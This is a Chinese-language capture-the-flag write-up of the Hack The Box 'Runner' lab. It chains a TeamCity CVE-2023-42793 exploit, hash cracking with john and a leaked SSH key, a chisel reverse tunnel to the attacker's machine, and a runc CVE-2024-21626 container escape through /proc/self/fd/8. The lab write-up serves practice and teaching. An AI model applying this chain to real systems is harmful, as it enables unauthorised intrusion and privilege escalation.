总体思路
子域名扫描->CVE-2023-42793利用->获取敏感信息->user->端口转发->CVE-2024-21626利用->root
信息收集&端口利用
nmap -sSVC 10.10.11.13
目标开放22、80、8000端口,这里先将runner.htb加入到hosts文件后,访问之
查看源码后也没发现可疑点,尝试目录扫描和子域名扫描
发现子域名teamcity.runner.htb,将其加入hosts后访问
CVE-2023-42793
查阅资料可知,teamcity为一个组件,在exploitDB上查找其漏洞
存在远程代码执行漏洞,尝试该POC
在执行两次后,可以拿到一个登录的用户名和密码
经过查找文件,发现在Backup模块可以备份文件,并且备份后的压缩包会在Diagnstics模块中显示
将其下载到本地分析,发现其中存在id_rsa和users文件
发现users文件中有两段密文,将其使用john解密后,能得到matthew的密码为piper123,但是却无法登录,推测id_rsa文件为其中某一个用户的登录凭证
经过测试后,得出id_rsa为john用户的登录私钥
ssh -i id_rsa john@runner.htb
端口转发
因为没有获得密码, 无法使用sudo -l查看权限,查看当前开放的端口是否存在敏感信息
netstat -nltp
发现有9000端口,使用chisel将其代理到本地
#kali:
chisel server -p 6150 --reverse
#靶机:
./chisel client 10.10.14.45:6150 R:9000:127.0.0.1:9000
访问本地9000端口
是一个portainer登录界面,回想起之前的matthew/piper123还未被使用,尝试使用其登录
成功登录
CVE-2024-21626
该漏洞由于runc的版本问题,会造成容器逃逸,具体链接详见:
https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd
新建一个容器,使用teamcity:latest作为镜像
将下方的Working Dir更改为/proc/self/fd/8,创建容器
创建完成后,打开控制台
使用root连接
虽然当前是在容器内,但是依然能做到任意文件读取,读取flag
266
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
